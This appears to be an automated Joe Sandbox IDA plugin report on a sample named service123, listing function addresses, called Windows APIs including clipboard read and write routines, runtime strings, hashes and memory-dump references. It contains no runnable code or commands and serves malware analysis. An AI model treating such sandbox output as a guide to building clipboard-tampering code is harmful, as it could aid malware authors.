Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: memcmpstrlen
String ID: Auth$Auth$Auth$Genu$Genu$Genu$default$hardware$rand_s$random_device::random_device(const std::string&): device not available$random_device::random_device(const std::string&): unsupported token$rdrand$rdrnd$rdseed
API String ID: 3108337309-1359127009
Opcode ID: ca8cbb317743a6d9b3252fb1a1bf3ffcc5f6991d58b7aa2b9ae5ed1dc55e3f46
Instruction ID: 1c2c0173801a3cca46328bdc34f1d8add0ec202f6313f20428c34a876024e2e8
Opcode Fuzzy Hash: ca8cbb317743a6d9b3252fb1a1bf3ffcc5f6991d58b7aa2b9ae5ed1dc55e3f46
Instruction Fuzzy Hash: 974135F22083914BF700AA38C49235AB6A2BB4431CF20593FD88AD7F51E63AD455CF63

Function 6C2BEE50 Relevance: 12.5, APIs: 8, Instructions: 494COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C2BF18B
malloc.MSVCRT ref: 6C2BF1A8

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: a0b78b01bca03af782b47593ced61503876eda7d4ce63b180f1597491b36d2fd
Instruction ID: b2476e31c7c96bc96ad67ebdbb5fbcb4da6c299b4d44e7a21207f1772555314b
Opcode Fuzzy Hash: a0b78b01bca03af782b47593ced61503876eda7d4ce63b180f1597491b36d2fd
Instruction Fuzzy Hash: AE125C7960870A8FC314CF18C08065BF7E1BF8839CF158A6DEC99A7B55D730E9098B92

Function 6C2DE6E0 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 219stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2DE70A
strlen.MSVCRT ref: 6C2DE77A

Strings

basic_string: construction from null is not valid, xrefs: 6C2DE742, 6C2DE7B2, 6C2DE822
basic_string: construction from null is not valid, xrefs: 6C2DE86F, 6C2DE8C0, 6C2DE910

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid$basic_string: construction from null is not valid
API String ID: 39653677-1250104765
Opcode ID: 7ea2ca1be2b47ae06bab8b35318878266ea51e4223095b3ea984ad98ebfc6ccf
Instruction ID: f3d0b5eaab1e88ccc62eaf27f63187adca69a7213e6137d5c863c82948509262
Opcode Fuzzy Hash: 7ea2ca1be2b47ae06bab8b35318878266ea51e4223095b3ea984ad98ebfc6ccf
Instruction Fuzzy Hash: 2B617FF1A156148FCB00BF28D48189AFBE4BF55218F46496DECC48B315E231E899CBD2

Function 6C2C9D11 Relevance: 12.0, APIs: 8, Instructions: 46clipboardmemorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C3539D0: strlen.MSVCRT ref: 6C3539DE

OpenClipboard.USER32 ref: 6C2C9D31
GlobalAlloc.KERNEL32 ref: 6C2C9D55
GlobalLock.KERNEL32 ref: 6C2C9D72
strcpy.MSVCRT ref: 6C2C9D82
GlobalUnlock.KERNEL32 ref: 6C2C9D8A
EmptyClipboard.USER32 ref: 6C2C9D93
SetClipboardData.USER32 ref: 6C2C9DA4
CloseClipboard.USER32 ref: 6C2C9DAD

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlockstrcpystrlen
String ID:
API String ID: 3344633682-0
Opcode ID: d07a6aa1da544faaa8ecca996302d54b0346129d183143128b6bc44a543deb0d
Instruction ID: a53d2c5f2f1221e1fb3a381d2730b44ab23f3c7bb078169a8b3a13f238668e5c
Opcode Fuzzy Hash: d07a6aa1da544faaa8ecca996302d54b0346129d183143128b6bc44a543deb0d
Instruction Fuzzy Hash: 5011C8B16143098BDB40BF78C5996AEBBF4BF15309F41492CE88687644EF35E518CB53

Function 6C2D0860 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 212stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2D0886
memcmp.MSVCRT ref: 6C2D08A9
memcmp.MSVCRT ref: 6C2D091F
memcmp.MSVCRT ref: 6C2D0991

Part of subcall function 6C37ADB0: strlen.MSVCRT ref: 6C37ADBE

memcmp.MSVCRT ref: 6C2D0A25

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C2D08D0, 6C2D0944, 6C2D09B7, 6C2D0A4C, 6C2D0A68
basic_string::compare, xrefs: 6C2D08C8, 6C2D093C, 6C2D09AF, 6C2D0A44, 6C2D0A60

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: 08ccb028bd6221cd21e4e6b9d16ddd910d11c6f38cb36298b23ec7e24688151b
Instruction ID: 8e4b6c208a527082125455792ac2dd1465a2103d0112606cd5338de1404dbf58
Opcode Fuzzy Hash: 08ccb028bd6221cd21e4e6b9d16ddd910d11c6f38cb36298b23ec7e24688151b
Instruction Fuzzy Hash: A961377660A3059FC304EF69C98085AFBE5AFD8788F55896DE9C8C7720D231E844CB96

Function 6C2C70C0 Relevance: 9.6, APIs: 6, Instructions: 649COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 6C2C70C7
memset.MSVCRT ref: 6C2C7217

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: localeconvmemset
String ID:
API String ID: 2367598729-0
Opcode ID: 89df01838e5722b00437c5cdfa5db2fb1644ee33392b4ccfe92380620f6223b8
Instruction ID: eaf0bb373980393f1a0dc616786668db397409f6007d8d092671f253067e1dd7
Opcode Fuzzy Hash: 89df01838e5722b00437c5cdfa5db2fb1644ee33392b4ccfe92380620f6223b8
Instruction Fuzzy Hash: 78429C7170830A8FD740CF29C48075ABBE2AB85B09F148B6DEC958BB41D775E949CB83

Function 6C2C5880 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 1506COMMON

Download Yara Rule

Strings

NaN, xrefs: 6C2C5B5F
Infinity, xrefs: 6C2C5BE0
, xrefs: 6C2C6D95
, xrefs: 6C2C7074

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID: $ $Infinity$NaN
API String ID: 0-3274152445
Opcode ID: a40f37b164cb9dbe7de820227af9bb0c8897b492cbe263d98a96d3bfe5df0010
Instruction ID: cd2dafde717f8561895eb9a5c9a78db4a163ecf8e9092bd26591341e642ed5ce
Opcode Fuzzy Hash: a40f37b164cb9dbe7de820227af9bb0c8897b492cbe263d98a96d3bfe5df0010
Instruction Fuzzy Hash: 1CE223B1A0934A8FD390CF29C18475ABBE0BF89748F148A2EE89597751E775D844CF83

Function 6C2C9E27 Relevance: 6.0, APIs: 4, Instructions: 38clipboardCOMMON

Download Yara Rule

APIs

GetClipboardData.USER32 ref: 6C2C9E37
GlobalLock.KERNEL32 ref: 6C2C9E49
GlobalUnlock.KERNEL32 ref: 6C2C9E6A
CloseClipboard.USER32 ref: 6C2C9E73
CloseClipboard.USER32 ref: 6C2C9E98

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: Clipboard$CloseGlobal$DataLockUnlock
String ID:
API String ID: 3186146249-0
Opcode ID: 048e7a2dc0d45b4825737d98beb20a3473370ef39ebe91fc1ff6f0b860c0cb3b
Instruction ID: 4cbfe959d145ae8aaa6f6e2c1c0049e25024d1c54409497945c694b797603ae3
Opcode Fuzzy Hash: 048e7a2dc0d45b4825737d98beb20a3473370ef39ebe91fc1ff6f0b860c0cb3b
Instruction Fuzzy Hash: 2CF06DB2B042018FEB007F7895581AEBBF4AB45205F450A3DD88297644DF30E52CCB93

Function 00AC51B0 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 1506COMMON

Download Yara Rule

Strings

, xrefs: 00AC66C5
, xrefs: 00AC69A4

Memory Dump Source

Source File: 00000004.00000002.2951693588.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000004.00000002.2951678920.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951709627.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951725080.0000000000ACE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951741403.0000000000AD1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac0000_service123.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 4e805b6ebbeb349802ef04c2352a8c51c02cc9b50a741aa77eaeaa9f8a1f3ff4
Instruction ID: 87b630eec915163718f6f084db389d322f36f95604aa03bebd04a2fa9d191e6f
Opcode Fuzzy Hash: 4e805b6ebbeb349802ef04c2352a8c51c02cc9b50a741aa77eaeaa9f8a1f3ff4
Instruction Fuzzy Hash: 53E211B1A087418FD720DF29C184B5AFBE0BF88754F16891DF89997361E775E8848F82

Function 6C2C44F0 Relevance: 5.4, Strings: 4, Instructions: 351COMMON

Download Yara Rule

Strings

gfff, xrefs: 6C2C4613
gfff, xrefs: 6C2C45FC
., xrefs: 6C2C47E4
@, xrefs: 6C2C46A9

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID: .$@$gfff$gfff
API String ID: 0-2633265772
Opcode ID: 8626a3e6e77548aa8c80ec26b31963b047f7067a9e1e968e0f87eb2c543a7be7
Instruction ID: 579ddc53f910055f30aa644994ca83b26df5a72007b438db30a7991e0d7a0c47
Opcode Fuzzy Hash: 8626a3e6e77548aa8c80ec26b31963b047f7067a9e1e968e0f87eb2c543a7be7
Instruction Fuzzy Hash: DAD1A471B0834A8BD744CE29C88476BBBE2AF85348F14C72DEC949BB55D770D9498B83

Function 00AC3E20 Relevance: 5.4, Strings: 4, Instructions: 351COMMON

Download Yara Rule

Strings

gfff, xrefs: 00AC3F2C
., xrefs: 00AC4114
@, xrefs: 00AC3FD9
gfff, xrefs: 00AC3F43

Memory Dump Source

Source File: 00000004.00000002.2951693588.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000004.00000002.2951678920.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951709627.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951725080.0000000000ACE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951741403.0000000000AD1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac0000_service123.jbxd

Similarity

API ID:
String ID: .$@$gfff$gfff
API String ID: 0-2633265772
Opcode ID: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
Instruction ID: 63c31da6c47df8fd6b4f78d86ad4c3cd0bd478750285c65faf5f10fca2f638e8
Opcode Fuzzy Hash: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
Instruction Fuzzy Hash: FCD1D572A083068BDB14DF29C494B5BBBE2AFD4340F1AC92DE8958F345D774DD448792

Function 6C353140 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

basic_string: construction from null is not valid, xrefs: 6C353250

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID: basic_string: construction from null is not valid
API String ID: 0-2991274800
Opcode ID: 6d0be9ba510c64ad1c49fee08d4dc25e603bd11664bae6518c7f5237b4f7e48a
Instruction ID: b3ca4ae968b02bf81e0861d49104519ef7ff8cfd51774c728b9a31f752f5d10f
Opcode Fuzzy Hash: 6d0be9ba510c64ad1c49fee08d4dc25e603bd11664bae6518c7f5237b4f7e48a
Instruction Fuzzy Hash: 98418BB29097108FC714DF29D480A4AFBE4EF99314F55C96EE8988B309D331D854CBA2

Function 6C350730 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C3507A0
memset.MSVCRT ref: 6C3507C4

Strings

basic_string::_M_replace_aux, xrefs: 6C350840

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: memmovememset
String ID: basic_string::_M_replace_aux
API String ID: 1288253900-2536181960
Opcode ID: 9ffb1775bf110bc77d06257571903203da877704e686b1b6018e3100b89dac90
Instruction ID: c01ddd33ef80235abb9f115c30330574c4d4325bd156ec85249c599af3178dca
Opcode Fuzzy Hash: 9ffb1775bf110bc77d06257571903203da877704e686b1b6018e3100b89dac90
Instruction Fuzzy Hash: 91316C75A096908FC7059F28C8C0A2ABFF1AFC6608F54896DE9988B755D633C854CF92

Function 6C323840 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C323898
memcpy.MSVCRT ref: 6C323911

Part of subcall function 6C325590: memcpy.MSVCRT ref: 6C325620

Strings

basic_string::_M_replace_aux, xrefs: 6C3238C0

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: memcpy$memset
String ID: basic_string::_M_replace_aux
API String ID: 438689982-2536181960
Opcode ID: 87bd3d5f6e8be28f5e86111a5bf49d31f2a3643184b5c490aecbdc55ea417e1e
Instruction ID: 4b1d31890f8224ff1e0fb9fc3fc9d616976866684ad76682ef97fd813c3b8898
Opcode Fuzzy Hash: 87bd3d5f6e8be28f5e86111a5bf49d31f2a3643184b5c490aecbdc55ea417e1e
Instruction Fuzzy Hash: CA215E72A0A3109FC340AF1D988056EFBE4EBC9658F944A6EE88897315D335D958CBD3

Function 6C2DA9E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C2DA9FD
wcslen.MSVCRT ref: 6C2DAA4D

Strings

basic_string: construction from null is not valid, xrefs: 6C2DAA20, 6C2DAA70

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: 7b179cceb2f7e660d81c247b00fc5883a658de0bbccdf3cad2cabba7e2b346bc
Instruction ID: 6c19f418a1e1112cc655bc427f35f3d0c70a2992a08520cd03a59f701914f318
Opcode Fuzzy Hash: 7b179cceb2f7e660d81c247b00fc5883a658de0bbccdf3cad2cabba7e2b346bc
Instruction Fuzzy Hash: 5C1160F19152248BCB00AF2CD1808AABBF4BF55218F4209ADE8C59B311E631E958CF92

Function 6C2DA5F0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C2DA60D
wcslen.MSVCRT ref: 6C2DA65D

Strings

basic_string: construction from null is not valid, xrefs: 6C2DA630, 6C2DA680

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: 7b179cceb2f7e660d81c247b00fc5883a658de0bbccdf3cad2cabba7e2b346bc
Instruction ID: 8b89d7d85c142c8a47d2395b13049dbfe72ce61f52e5fc21f70f5ed75651e028
Opcode Fuzzy Hash: 7b179cceb2f7e660d81c247b00fc5883a658de0bbccdf3cad2cabba7e2b346bc
Instruction Fuzzy Hash: 9F1160F19152148BCB00AF2CD0808AABBF4BF55218F4209ADE8C49B311E631E959CF92

Function 6C2E98F0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 1123COMMON

Download Yara Rule

Strings

-, xrefs: 6C2EA30E

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 1d8559249cd1d78071c73b3e101ec19df2de10527f436b6a985aa20344fdf0b0
Instruction ID: de32495915ed1e39e6c3fe1317e2ce27bee3edd1b90625b4549162e476356cf1
Opcode Fuzzy Hash: 1d8559249cd1d78071c73b3e101ec19df2de10527f436b6a985aa20344fdf0b0
Instruction Fuzzy Hash: 03A28D70A04359CFDB10DF69C480B8DBBF2AF4A325FA88659E865AB692D730DC45CF50

Function 6C2E87C0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 1122COMMON

Download Yara Rule

Strings

-, xrefs: 6C2E91DE

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 87db807ef60010eadc02c2c0b70d2d21371cbaa1d252cc5b7bc8480ad3cd049c
Instruction ID: a0758b231db8fad1a5a68aeaad0c4c2da48890fdcdf8ad7d88b6a5b7c20f577e
Opcode Fuzzy Hash: 87db807ef60010eadc02c2c0b70d2d21371cbaa1d252cc5b7bc8480ad3cd049c
Instruction Fuzzy Hash: CCA28F70A043598FDB10CF69C48078DBBF2BF4A315FA8865AE8A5BB692D730DC45CB51

Function 6C323690 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

basic_string::_S_construct null not valid, xrefs: 6C323710

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
